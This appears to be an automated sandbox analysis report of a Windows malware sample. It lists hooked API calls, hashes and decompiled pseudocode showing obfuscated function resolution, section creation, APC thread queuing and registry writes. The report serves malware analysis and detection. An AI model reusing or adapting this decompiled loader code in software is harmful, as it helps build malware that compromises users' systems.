                                • Part of subcall function 013E4176: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,03AD89D4,013E6FE2,?,?,?,?,?,?,?,?,?,?,?,013E6FE2), ref: 013E4242
                                • Part of subcall function 013E5F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 013E5FAF
                                • Part of subcall function 013E5F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 013E5FE0
                              • SysAllocString.OLEAUT32(00000000), ref: 013E700E
                              • SysAllocString.OLEAUT32(0070006F), ref: 013E7022
                              • SysAllocString.OLEAUT32(00000000), ref: 013E7034
                              • SysFreeString.OLEAUT32(00000000), ref: 013E7098
                              • SysFreeString.OLEAUT32(00000000), ref: 013E70A7
                              • SysFreeString.OLEAUT32(00000000), ref: 013E70B2
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                              • String ID:
                              • API String ID: 2831207796-0
                              • Opcode ID: 09cf850bcfe1eafca10cc51a52ff924fb69b57994604e46dc3e75215b90dc144
                              • Instruction ID: 8e16bc2de6f4d0d183e5c35db9c944a6971397214a2770824041bbc2d5659ac1
                              • Opcode Fuzzy Hash: 09cf850bcfe1eafca10cc51a52ff924fb69b57994604e46dc3e75215b90dc144
                              • Instruction Fuzzy Hash: 32311E36900619AFDB11DFBCC848A9EBFFAAF49314F144465EE10EB1A0DB719D05CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32(?,?,0104F4B4,00000000,?,0104C588,00000018,01043641,?,00000002,0104F518,00000003,0104F514,00000000,03AE75A8), ref: 0102C74B
                              • VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,03AE75A8,?,?,0104F4B4,00000000,?,0104C588,00000018,01043641), ref: 0102C7D6
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 0102C7FE
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 0102C81C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                              • String ID:
                              • API String ID: 3666628472-0
                              • Opcode ID: 570480fb48b7584e875601f9a0ea344d312125c0945d9a72fe76e81f54df11df
                              • Instruction ID: 7fa5266a01c369ada9d0455704b9c10dd4fd1a7b801fc771fedff81f72d82728
                              • Opcode Fuzzy Hash: 570480fb48b7584e875601f9a0ea344d312125c0945d9a72fe76e81f54df11df
                              • Instruction Fuzzy Hash: 4B41C1B4A00715EFEB11DF69C980A9EBBF8FF48310B108569E586E7210C775E940CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0102D660,?,?,01033C99,?,00000000), ref: 01029729
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0102974B
                              • GetProcAddress.KERNEL32(00000000,?), ref: 01029761
                              • GetProcAddress.KERNEL32(00000000,?), ref: 01029777
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0102978D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 010297A3
                                • Part of subcall function 0103963A: NtCreateSection.NTDLL(01033C99,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 01039697
                                • Part of subcall function 0103963A: memset.NTDLL ref: 010396BB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: fc0fa0d6ad654896cf8a2c7c22046829ff658efafb53f47fd82c0f6e87478efe
                              • Instruction ID: 8237c5cdbd1c4dbe8e92b5ad70eea2f7dce5de6151b6f5e672a2d35a0856661f
                              • Opcode Fuzzy Hash: fc0fa0d6ad654896cf8a2c7c22046829ff658efafb53f47fd82c0f6e87478efe
                              • Instruction Fuzzy Hash: DB2128B560032AEFD760DF69D884E9B7BECFF08388B014566E985C7205E775E905CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E6CE5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                              				intOrPtr _v8;
                              				intOrPtr _t23;
                              				intOrPtr _t26;
                              				_Unknown_base(*)()* _t28;
                              				intOrPtr _t30;
                              				_Unknown_base(*)()* _t32;
                              				intOrPtr _t33;
                              				_Unknown_base(*)()* _t35;
                              				intOrPtr _t36;
                              				_Unknown_base(*)()* _t38;
                              				intOrPtr _t39;
                              				_Unknown_base(*)()* _t41;
                              				intOrPtr _t44;
                              				struct HINSTANCE__* _t48;
                              				intOrPtr _t54;
                              
                              				_t54 = E013E55DC(0x20);
                              				if(_t54 == 0) {
                              					_v8 = 8;
                              				} else {
                              					_t23 =  *0x13ed2b8; // 0x26ea5a8
                              					_t1 = _t23 + 0x13ee11a; // 0x4c44544e
                              					_t48 = GetModuleHandleA(_t1);
                              					_t26 =  *0x13ed2b8; // 0x26ea5a8
                              					_t2 = _t26 + 0x13ee782; // 0x7243775a
                              					_v8 = 0x7f;
                              					_t28 = GetProcAddress(_t48, _t2);
                              					 *(_t54 + 0xc) = _t28;
                              					if(_t28 == 0) {
                              						L8:
                              						E013E6DFA(_t54);
                              					} else {
                              						_t30 =  *0x13ed2b8; // 0x26ea5a8
                              						_t5 = _t30 + 0x13ee76f; // 0x614d775a
                              						_t32 = GetProcAddress(_t48, _t5);
                              						 *(_t54 + 0x10) = _t32;
                              						if(_t32 == 0) {
                              							goto L8;
                              						} else {
                              							_t33 =  *0x13ed2b8; // 0x26ea5a8
                              							_t7 = _t33 + 0x13ee4ce; // 0x6e55775a
                              							_t35 = GetProcAddress(_t48, _t7);
                              							 *(_t54 + 0x14) = _t35;
                              							if(_t35 == 0) {
                              								goto L8;
                              							} else {
                              								_t36 =  *0x13ed2b8; // 0x26ea5a8
                              								_t9 = _t36 + 0x13ee406; // 0x4e6c7452
                              								_t38 = GetProcAddress(_t48, _t9);
                              								 *(_t54 + 0x18) = _t38;
                              								if(_t38 == 0) {
                              									goto L8;
                              								} else {
                              									_t39 =  *0x13ed2b8; // 0x26ea5a8
                              									_t11 = _t39 + 0x13ee792; // 0x6c43775a
                              									_t41 = GetProcAddress(_t48, _t11);
                              									 *(_t54 + 0x1c) = _t41;
                              									if(_t41 == 0) {
                              										goto L8;
                              									} else {
                              										 *((intOrPtr*)(_t54 + 4)) = _a4;
                              										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                              										_t44 = E013E7562(_t54, _a8); // executed
                              										_v8 = _t44;
                              										if(_t44 != 0) {
                              											goto L8;
                              										} else {
                              											 *_a12 = _t54;
                              										}
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _v8;
                              			}

                              APIs
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,013E87BD,?,?,?,?,00000000,00000000), ref: 013E6D0A
                              • GetProcAddress.KERNEL32(00000000,7243775A), ref: 013E6D2C
                              • GetProcAddress.KERNEL32(00000000,614D775A), ref: 013E6D42
                              • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 013E6D58
                              • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 013E6D6E
                              • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 013E6D84
                                • Part of subcall function 013E7562: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,013E6DA4), ref: 013E75BF
                                • Part of subcall function 013E7562: memset.NTDLL ref: 013E75E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: d262b4208c0edf3853461b84df0ecf64c391637621053570540b8872f125a62d
                              • Instruction ID: 2dfaac3ec52a2baf17f87068237eb48f7939160451d65c8778286bd7fae5178d
                              • Opcode Fuzzy Hash: d262b4208c0edf3853461b84df0ecf64c391637621053570540b8872f125a62d
                              • Instruction Fuzzy Hash: 6B2151B150031A9FDB60DF68C849EAB7BFCEB14358B044529E509CB2D4D771E9498F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateThread.KERNELBASE(00000000,00000000,00000000,?,010501F8,010210B6), ref: 0102348C
                              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 010234A1
                              • GetLastError.KERNEL32(00000000), ref: 010234AC
                              • TerminateThread.KERNEL32(00000000,00000000), ref: 010234B6
                              • CloseHandle.KERNEL32(00000000), ref: 010234BD
                              • SetLastError.KERNEL32(00000000), ref: 010234C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                              • String ID:
                              • API String ID: 3832013932-0
                              • Opcode ID: 01d28198ab4a86cf29940c99112759638805e124e2f3c858501bdffc57a8bca0
                              • Instruction ID: 6b66ffeb4d9effe5b5ccbf53669c45cac18082790f4700d9d21177106e758a8e
                              • Opcode Fuzzy Hash: 01d28198ab4a86cf29940c99112759638805e124e2f3c858501bdffc57a8bca0
                              • Instruction Fuzzy Hash: EBF012BA786321FFE7325FA4AD88F5F7F69FB09791F004405F68696168C72E48108B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E013E48E5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                              				signed int _v8;
                              				char _v12;
                              				signed int* _v16;
                              				char _v284;
                              				void* __esi;
                              				char* _t59;
                              				intOrPtr* _t60;
                              				void* _t62;
                              				intOrPtr _t64;
                              				char _t65;
                              				void* _t67;
                              				intOrPtr _t68;
                              				intOrPtr _t69;
                              				intOrPtr _t71;
                              				void* _t73;
                              				signed int _t81;
                              				void* _t91;
                              				void* _t92;
                              				char _t98;
                              				signed int* _t100;
                              				intOrPtr* _t101;
                              				void* _t102;
                              
                              				_t92 = __ecx;
                              				_v8 = _v8 & 0x00000000;
                              				_t98 = _a16;
                              				if(_t98 == 0) {
                              					__imp__( &_v284,  *0x13ed36c);
                              					_t91 = 0x80000002;
                              					L6:
                              					_t59 = E013E65F6( &_v284,  &_v284);
                              					_a8 = _t59;
                              					if(_t59 == 0) {
                              						_v8 = 8;
                              						L29:
                              						_t60 = _a20;
                              						if(_t60 != 0) {
                              							 *_t60 =  *_t60 + 1;
                              						}
                              						return _v8;
                              					}
                              					_t101 = _a24;
                              					_t62 = E013E691B(_t92, _t97, _t101, _t91, _t59); // executed
                              					if(_t62 != 0) {
                              						L27:
                              						E013E6DFA(_a8);
                              						goto L29;
                              					}
                              					_t64 =  *0x13ed2b0; // 0x3ad9b78
                              					_t16 = _t64 + 0xc; // 0x3ad9c46
                              					_t65 = E013E65F6(_t64,  *_t16);
                              					_a24 = _t65;
                              					if(_t65 == 0) {
                              						L14:
                              						_t29 = _t101 + 0x14; // 0x102
                              						_t33 = _t101 + 0x10; // 0x3d013ec0, executed
                              						_t67 = E013E6E41(_t97,  *_t33, _t91, _a8,  *0x13ed364,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                              						if(_t67 == 0) {
                              							_t68 =  *0x13ed2b8; // 0x26ea5a8
                              							if(_t98 == 0) {
                              								_t35 = _t68 + 0x13eea23; // 0x4d4c4b48
                              								_t69 = _t35;
                              							} else {
                              								_t34 = _t68 + 0x13ee8cb; // 0x55434b48
                              								_t69 = _t34;
                              							}
                              							if(E013E5D44(_t69,  *0x13ed364,  *0x13ed368,  &_a24,  &_a16) == 0) {
                              								if(_t98 == 0) {
                              									_t71 =  *0x13ed2b8; // 0x26ea5a8
                              									_t44 = _t71 + 0x13ee83e; // 0x74666f53
                              									_t73 = E013E65F6(_t44, _t44);
                              									_t99 = _t73;
                              									if(_t73 == 0) {
                              										_v8 = 8;
                              									} else {
                              										_t47 = _t101 + 0x10; // 0x3d013ec0
                              										E013E4FA0( *_t47, _t91, _a8,  *0x13ed368, _a24);
                              										_t49 = _t101 + 0x10; // 0x3d013ec0
                              										E013E4FA0( *_t49, _t91, _t99,  *0x13ed360, _a16);
                              										E013E6DFA(_t99);
                              									}
                              								} else {
                              									_t40 = _t101 + 0x10; // 0x3d013ec0
                              									E013E4FA0( *_t40, _t91, _a8,  *0x13ed368, _a24);
                              									_t43 = _t101 + 0x10; // 0x3d013ec0, executed
                              									E013E4FA0( *_t43, _t91, _a8,  *0x13ed360, _a16); // executed
                              								}
                              								if( *_t101 != 0) {
                              									E013E6DFA(_a24);
                              								} else {
                              									 *_t101 = _a16;
                              								}
                              							}
                              						}
                              						goto L27;
                              					}
                              					_t21 = _t101 + 0x10; // 0x3d013ec0, executed
                              					_t81 = E013E5607( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                              					if(_t81 == 0) {
                              						_t100 = _v16;
                              						if(_v12 == 0x28) {
                              							 *_t100 =  *_t100 & _t81;
                              							_t26 = _t101 + 0x10; // 0x3d013ec0
                              							E013E6E41(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                              						}
                              						E013E6DFA(_t100);
                              						_t98 = _a16;
                              					}
                              					E013E6DFA(_a24);
                              					goto L14;
                              				}
                              				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                              					goto L29;
                              				} else {
                              					_t97 = _a8;
                              					E013EAA99(_t98, _a8,  &_v284);
                              					__imp__(_t102 + _t98 - 0x117,  *0x13ed36c);
                              					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                              					_t91 = 0x80000003;
                              					goto L6;
                              				}
                              			}

                              APIs
                              • StrChrA.SHLWAPI(013E6096,0000005F,00000000,00000000,00000104), ref: 013E4918
                              • lstrcpy.KERNEL32(?,?), ref: 013E4945
                                • Part of subcall function 013E65F6: lstrlen.KERNEL32(?,00000000,03AD9B78,00000000,013E25B8,03AD9D56,69B25F44,?,?,?,?,69B25F44,00000005,013ED00C,4D283A53,?), ref: 013E65FD
                                • Part of subcall function 013E65F6: mbstowcs.NTDLL ref: 013E6626
                                • Part of subcall function 013E65F6: memset.NTDLL ref: 013E6638
                                • Part of subcall function 013E4FA0: lstrlenW.KERNEL32(?,?,?,013E4AAE,3D013EC0,80000002,013E6096,013EA6E1,74666F53,4D4C4B48,013EA6E1,?,3D013EC0,80000002,013E6096,?), ref: 013E4FC5
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              • lstrcpy.KERNEL32(?,00000000), ref: 013E4967
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                              • String ID: ($\
                              • API String ID: 3924217599-1512714803
                              • Opcode ID: e1652a73f3ed3554c84ffb21c99547e6ecf5c18b481c1e30520fdd37acb2acd4
                              • Instruction ID: 1d4f0f268916bc938dd7f9b355878a8804210e7f4c6d54e0ffb21cb00eed82b0
                              • Opcode Fuzzy Hash: e1652a73f3ed3554c84ffb21c99547e6ecf5c18b481c1e30520fdd37acb2acd4
                              • Instruction Fuzzy Hash: A951397510031AEFEF229FA8DC48EAA7BFDFB18318F004115FA25AA1E4D731D9659B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010315E7
                                • Part of subcall function 01038E6E: RtlEnterCriticalSection.NTDLL(00000000), ref: 01038E7A
                                • Part of subcall function 01038E6E: CloseHandle.KERNEL32(?), ref: 01038E88
                                • Part of subcall function 01038E6E: RtlLeaveCriticalSection.NTDLL(00000000), ref: 01038EA4
                              • CloseHandle.KERNEL32(?), ref: 010315F5
                              • InterlockedDecrement.KERNEL32(010500BC), ref: 01031604
                                • Part of subcall function 01042501: SetEvent.KERNEL32(00000760,0103161F), ref: 0104250B
                                • Part of subcall function 01042501: CloseHandle.KERNEL32(00000760), ref: 01042520
                                • Part of subcall function 01042501: HeapDestroy.KERNELBASE(04740000), ref: 01042530
                              • RtlExitUserThread.NTDLL(00000000), ref: 01031620
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                              • String ID: t
                              • API String ID: 1141245775-2238339752
                              • Opcode ID: a268d3b93e075b84438e0c83f85540f14721c7f12238225318327f66aaba93ea
                              • Instruction ID: 9cc3c66e6948da37caaeaf17abb251a4db671eb4dd1ac0e166854dd5d7e7beca
                              • Opcode Fuzzy Hash: a268d3b93e075b84438e0c83f85540f14721c7f12238225318327f66aaba93ea
                              • Instruction Fuzzy Hash: 6CF0C874680300ABD7625F68CD45E9F3B6CEB49770F100258F9A6871C4DB7949018BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E013E3A19(void** __esi) {
                              				intOrPtr _v0;
                              				intOrPtr _t4;
                              				intOrPtr _t6;
                              				void* _t8;
                              				void* _t9;
                              				intOrPtr _t10;
                              				void* _t11;
                              				void** _t13;
                              
                              				_t13 = __esi;
                              				_t4 =  *0x13ed35c; // 0x3ad95b0
                              				__imp__(_t4 + 0x40);
                              				while(1) {
                              					_t6 =  *0x13ed35c; // 0x3ad95b0
                              					_t1 = _t6 + 0x58; // 0x0
                              					if( *_t1 == 0) {
                              						break;
                              					}
                              					Sleep(0xa);
                              				}
                              				_t8 =  *_t13;
                              				if(_t8 != 0 && _t8 != 0x13ed030) {
                              					HeapFree( *0x13ed270, 0, _t8);
                              				}
                              				_t9 = E013E311C(_v0, _t13); // executed
                              				_t13[1] = _t9;
                              				_t10 =  *0x13ed35c; // 0x3ad95b0
                              				_t11 = _t10 + 0x40;
                              				__imp__(_t11);
                              				return _t11;
                              			}

                              APIs
                              • RtlEnterCriticalSection.NTDLL(03AD9570), ref: 013E3A22
                              • Sleep.KERNEL32(0000000A), ref: 013E3A2C
                              • HeapFree.KERNEL32(00000000,00000000), ref: 013E3A54
                              • RtlLeaveCriticalSection.NTDLL(03AD9570), ref: 013E3A70
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID: Uxt
                              • API String ID: 58946197-1536154274
                              • Opcode ID: eba8e0075a2efe55c31d0d0e801abe0f74b42cfac4a19526a466e22311c30989
                              • Instruction ID: 06bab1e1c12c593a098f4c30096e5474e7784e8aa7568371b11ed9c263b48948
                              • Opcode Fuzzy Hash: eba8e0075a2efe55c31d0d0e801abe0f74b42cfac4a19526a466e22311c30989
                              • Instruction Fuzzy Hash: 82F0B271600351AFEB319FA8E849B1A7BF8BB12348F089404E902CB2D5D620E854CB25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 64%
                              			E013E587D(signed int __edx) {
                              				signed int _v8;
                              				long _v12;
                              				CHAR* _v16;
                              				long _v20;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t21;
                              				CHAR* _t22;
                              				CHAR* _t25;
                              				intOrPtr _t26;
                              				void* _t27;
                              				void* _t31;
                              				void* _t32;
                              				CHAR* _t35;
                              				CHAR* _t41;
                              				CHAR* _t42;
                              				CHAR* _t43;
                              				void* _t48;
                              				void* _t50;
                              				signed char _t55;
                              				intOrPtr _t57;
                              				signed int _t58;
                              				void* _t62;
                              				CHAR* _t66;
                              				CHAR* _t67;
                              				char* _t68;
                              				void* _t69;
                              
                              				_t60 = __edx;
                              				_v20 = 0;
                              				_v8 = 0;
                              				_v12 = 0;
                              				_t21 = E013E6DCB();
                              				if(_t21 != 0) {
                              					_t58 =  *0x13ed294; // 0x2000000a
                              					_t54 = (_t58 & 0xf0000000) + _t21;
                              					 *0x13ed294 = (_t58 & 0xf0000000) + _t21;
                              				}
                              				_t22 =  *0x13ed12c(0, 2); // executed
                              				_v16 = _t22;
                              				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                              					_t25 = E013E5203( &_v8,  &_v20); // executed
                              					_t53 = _t25;
                              					_t26 =  *0x13ed2b8; // 0x26ea5a8
                              					if( *0x13ed294 > 5) {
                              						_t8 = _t26 + 0x13ee5cd; // 0x4d283a53
                              						_t27 = _t8;
                              					} else {
                              						_t7 = _t26 + 0x13ee9d9; // 0x44283a44
                              						_t27 = _t7;
                              					}
                              					E013E3D42(_t27, _t27);
                              					_t31 = E013E5C7F(_t60,  &_v20,  &_v12); // executed
                              					if(_t31 == 0) {
                              						CloseHandle(_v20);
                              					}
                              					_t62 = 5;
                              					if(_t53 != _t62) {
                              						 *0x13ed2a8 =  *0x13ed2a8 ^ 0x81bbe65d;
                              						_t32 = E013E55DC(0x60);
                              						__eflags = _t32;
                              						 *0x13ed35c = _t32;
                              						if(_t32 == 0) {
                              							_push(8);
                              							_pop(0);
                              						} else {
                              							memset(_t32, 0, 0x60);
                              							_t48 =  *0x13ed35c; // 0x3ad95b0
                              							_t69 = _t69 + 0xc;
                              							__imp__(_t48 + 0x40);
                              							_t50 =  *0x13ed35c; // 0x3ad95b0
                              							 *_t50 = 0x13ee823;
                              						}
                              						__eflags = 0;
                              						_t53 = 0;
                              						if(0 == 0) {
                              							_t35 = RtlAllocateHeap( *0x13ed270, 0, 0x43);
                              							__eflags = _t35;
                              							 *0x13ed300 = _t35;
                              							if(_t35 == 0) {
                              								_push(8);
                              								_pop(0);
                              							} else {
                              								_t55 =  *0x13ed294; // 0x2000000a
                              								_t60 = _t55 & 0x000000ff;
                              								_t57 =  *0x13ed2b8; // 0x26ea5a8
                              								_t13 = _t57 + 0x13ee55a; // 0x697a6f4d
                              								_t54 = _t13;
                              								wsprintfA(_t35, _t13, _t55 & 0x000000ff, _t55 & 0x000000ff, 0x13ec2a7);
                              							}
                              							__eflags = 0;
                              							_t53 = 0;
                              							if(0 == 0) {
                              								asm("sbb eax, eax");
                              								E013EA303( ~_v8 &  *0x13ed2a8, 0x13ed00c); // executed
                              								_t41 = E013E294D(0, _t54, _t62, 0x13ed00c); // executed
                              								_t53 = _t41;
                              								__eflags = _t53;
                              								if(_t53 != 0) {
                              									goto L30;
                              								}
                              								_t42 = E013E2551();
                              								__eflags = _t42;
                              								if(_t42 != 0) {
                              									__eflags = _v8;
                              									_t66 = _v12;
                              									if(_v8 != 0) {
                              										L29:
                              										_t43 = E013E5038(_t60, _t66, _v8); // executed
                              										_t53 = _t43;
                              										goto L30;
                              									}
                              									__eflags = _t66;
                              									if(__eflags == 0) {
                              										goto L30;
                              									}
                              									_t53 = E013E8BA7(__eflags,  &(_t66[4]));
                              									__eflags = _t53;
                              									if(_t53 == 0) {
                              										goto L30;
                              									}
                              									goto L29;
                              								}
                              								_t53 = 8;
                              							}
                              						}
                              					} else {
                              						_t67 = _v12;
                              						if(_t67 == 0) {
                              							L30:
                              							if(_v16 == 0 || _v16 == 1) {
                              								E013ED128(); // executed
                              							}
                              							goto L34;
                              						}
                              						_t68 =  &(_t67[4]);
                              						do {
                              						} while (E013E62E1(_t62, _t68, 0, 1) == 0x4c7);
                              					}
                              					goto L30;
                              				} else {
                              					_t53 = _t22;
                              					L34:
                              					return _t53;
                              				}
                              			}
                              Instruction addresses for the listing above (the decompiler's side-by-side address column, one entry per code line, spilled out of alignment by extraction): 0x013e587d through 0x013e5a57, with 0x00000000 for lines that emit no instruction.

                              APIs
                                • Part of subcall function 013E6DCB: GetModuleHandleA.KERNEL32(4C44544E,00000000,013E5895,00000001), ref: 013E6DDA
                              • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 013E5912
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • memset.NTDLL ref: 013E5962
                              • RtlInitializeCriticalSection.NTDLL(03AD9570), ref: 013E5973
                                • Part of subcall function 013E8BA7: memset.NTDLL ref: 013E8BC1
                                • Part of subcall function 013E8BA7: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 013E8C07
                                • Part of subcall function 013E8BA7: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 013E8C12
                              • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 013E599E
                              • wsprintfA.USER32 ref: 013E59CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                              • String ID:
                              • API String ID: 4246211962-0
                              • Opcode ID: 6e50d75149bb496e283e8c253af60c9e45acbd190bafdd4e9f6f87b4d18a7d8d
                              • Instruction ID: 4bf77adadafbc4ec9f5bd5c96ce0f67a8f64bc293481fcdc28b0e306f5ded126
                              • Opcode Fuzzy Hash: 6e50d75149bb496e283e8c253af60c9e45acbd190bafdd4e9f6f87b4d18a7d8d
                              • Instruction Fuzzy Hash: 3C51D975A10339ABEB329BE8DC8CB6E7BEDAB1471CF144426E501DB1C1E770D9458B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E4B5B(signed int _a4, signed int* _a8) {
                              				void* __ecx;
                              				void* __edi;
                              				signed int _t6;
                              				intOrPtr _t8;
                              				intOrPtr _t12;
                              				long _t14;
                              				void* _t18;
                              				WCHAR* _t19;
                              				long _t20;
                              				void* _t25;
                              				void* _t26;
                              				signed int* _t28;
                              				CHAR* _t30;
                              				long _t31;
                              				WCHAR** _t32;
                              
                              				_t6 =  *0x13ed2a8; // 0xd448b889
                              				_t32 = _a4;
                              				_a4 = _t6 ^ 0x109a6410;
                              				_t8 =  *0x13ed2b8; // 0x26ea5a8
                              				_t3 = _t8 + 0x13ee876; // 0x61636f4c
                              				_t25 = 0;
                              				_t30 = E013E760A(_t3, 1);
                              				if(_t30 != 0) {
                              					_t25 = CreateEventA(0x13ed2e4, 1, 0, _t30);
                              					E013E6DFA(_t30);
                              				}
                              				_t12 =  *0x13ed294; // 0x2000000a
                              				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                              					L12:
                              					_t28 = _a8;
                              					if(_t28 != 0) {
                              						 *_t28 =  *_t28 | 0x00000001;
                              					}
                              					_t14 = E013E87A1(_t32, _t26); // executed
                              					_t31 = _t14;
                              					if(_t31 == 0 && _t25 != 0) {
                              						_t31 = WaitForSingleObject(_t25, 0x4e20);
                              					}
                              					if(_t28 != 0 && _t31 != 0) {
                              						 *_t28 =  *_t28 & 0xfffffffe;
                              					}
                              					goto L20;
                              				} else {
                              					_t18 = E013E3309(); // executed
                              					if(_t18 != 0) {
                              						goto L12;
                              					}
                              					_t19 = StrChrW( *_t32, 0x20);
                              					if(_t19 != 0) {
                              						 *_t19 = 0;
                              						_t19 =  &(_t19[1]);
                              					}
                              					_t20 = E013E62E1(0,  *_t32, _t19, 0); // executed
                              					_t31 = _t20;
                              					if(_t31 == 0) {
                              						if(_t25 == 0) {
                              							L22:
                              							return _t31;
                              						}
